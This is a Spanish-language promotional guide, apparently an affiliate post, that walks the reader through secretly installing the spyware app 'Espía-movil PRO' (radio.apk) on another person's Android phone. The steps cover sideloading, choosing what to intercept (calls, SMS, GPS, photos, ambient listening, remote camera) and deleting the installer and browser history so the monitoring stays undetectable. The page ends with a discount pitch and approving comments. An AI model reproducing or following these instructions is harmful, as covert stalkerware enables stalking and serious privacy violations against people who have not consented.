Modo de empleo: instalar Espía-movil PRO en un Android

Esta guía explica como instalar Espía-movil PRO en un smartphone ANDROID. Podrás constatar después de haber leído la guía, que la instalación de esta aplicación es muy simple y se hace en algunos minutos. Una vez efectuada la instalación, tendrás que venir aquí para conectarte a tu interfaz y ver el estado de los datos. Necesitarás un login y contraseña que te habrán dado al abrir una cuenta Espía-movil. Si aún no la tienes, entra en esta dirección para hacerlo.

Al terminar de leer este artículo, sabrás como obtener todos los datos de un smartphone que necesitas, de forma totalmente discreta e indetectable.

PROCESO DE INSTALACIÓN SOBRE UN TELÉFONO ANDROID

1/ Fuentes desconocidas

No merece la pena conectar el smartphone a tu ordenador. Basta con coger el teléfono y pulsar el botón « Home », « Opciones », después « Aplicaciones» y allí señalar la casilla « Fuentes desconocidas ». Por lo general, esta aplicación está presente. Si no se encuentra disponible en el teléfono, descárgala e instala la siguiente aplicación en el teléfono. Después sigue la guía explicada aquí.

2/ radio.apk

Descarga el fichero, siempre desde el teléfono. Después abre el navegador web del smartphone, clica en “Menú” y después en “Más”. Allí encontrarás la opción “Descargas”, clica encima y verás el fichero radio.apk que acabas de descargar. Clica encima de él: la instalación va a comenzar. Si no funciona, tendrás que instalar la aplicación gratuita APKInstaller yendo al store de Android.

radioapk

3/ Instalación radio

Finalmente, el fichero Radio queda instalado. Al final del proceso de instalación, clica en « Abrir la aplicación ». Las condiciones de utilización están adjuntas y es preciso aceptarlas.

termsconditions

4/ Tu clave de licencia

Finalmente, tan sólo falta grabar tu clave de licencia. Una pantalla te la pedirá tras haber aceptado las condiciones de utilización. Si no conoces tu clave de licencia, basta con conectarte a http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=945501-0004&PA=2439473 con el email y la contraseña que hayas elegido al efectuar la inscripción. Tu clave de licencia te será adjuntada tras haber metido tus datos identificativos como se muestra en la siguiente impresión de pantalla.

inscripcion-spybubble

Tras haber esperado algunos segundos (ten paciencia) la pantalla« Activación realizada » aparecerá para hacerte saber que has activado con éxito tu clave.

licencekey

5/ Mete el número observador

Como ya he explicado aquí, el número observador es el del teléfono que utilizarás para activar a distancia Espía-movil : por ejemplo, para enviar los SMS secretos que activen la cámara de fotos. Ese no es el número de teléfono del smartphone vigilado. Es el número de tu móvil “observador”.

Marca su número en la pantalla que aparece, sin el 0 y sin el +34. ¡La instalación ha terminado! Una pantalla de opciones aparece ante ti para preguntarte cuáles son las funciones que quieres y las que no quieres utilizar.

6/ Las opciones que deseas activar

Deberás indicar lo que quieras vigilar en la pantalla de opciones que aparece:

  • 1. las llamadas telefónicas
  • 2. los SMS
  • 3. los contactos
  • 4. el calendario de eventos del smartphone
  • 5. las URLs por las que navega el smartphone
  • 6. las fotografías tomadas por el aparato
  • 7. la localización GPS (deberás indicar el intervalo de puesta al día GPS : entre 15 y 60 minutos)
  • 8. el modo de comunicación: ¿deseas ser advertido de esos datos por SMS directamente sobre tu teléfono observador o deseas leerlos online en tu cuenta de Internet?

También tendrás una tecla de opciones avanzadas que te permitirán indicar tus preferencias (Si/No) al pulsar encima:

  • 1. ¿Quieres grabar las llamadas entrantes?
  • 2. ¿Las llamadas salientes?
  • 3. ¿Activar la escucha ambiental?
  • 4. ¿Activar la toma de fotos o vídeos en tiempo real?

settings

7/ Reiniciar el teléfono vigilado

Reinicia el teléfono.

8/ Borra el fichero de instalación

Abre el navegador Internet y ve a « Menú », « Más », « Descargas ». Allí verás el fichero de instalación « radio.apk », pulsa encima con el dedo hasta que aparezca el menú. Allí, entre las opciones que aparecen, pulsa en « Borrar de la lista y suprimir ».

9/ Borra el historial de descargas

Abre tu navegador de Internet y ve a « Menú », « Más », « Historial ». Allí verás BIBIspy.com, mantén el dedo pulsando encima y cuando el menú aparezca, elige« Borrar el historial » en las opciones que aparezcan.

Después de algunos minutos, los datos comenzarán a ser grabados en tu cuenta.

Tre Fleccia

flagrante-delito

Bibispy es la aplicación de monitoreo más efectiva.

A través de este enlace promocional, obtendrá un 22% de descuento.

Pruébelo!

{ 4 comentarios… add one }
  • Sean Baraja mayo 6, 2015, 3:13 am

    Yo uso esta aplicación para localizar el teléfono de mi hijo donde quiera que esté. Todo funciona bien, gracias.

    Respuesta
    • bar mayo 30, 2015, 11:12 am

      de donde lo pudiste descargar?

      Respuesta
      • Cain Ortega junio 6, 2015, 8:22 pm

        Busque en la parte superior de esta página, se encuentra la url

        Respuesta
        • Cain Ortega junio 6, 2015, 8:23 pm

          Estos son programas que tienen aplicaciones legales a su teléfono

          Respuesta

Deja un comentario

Next Post:

Previous Post:

Pin It on Pinterest

Share This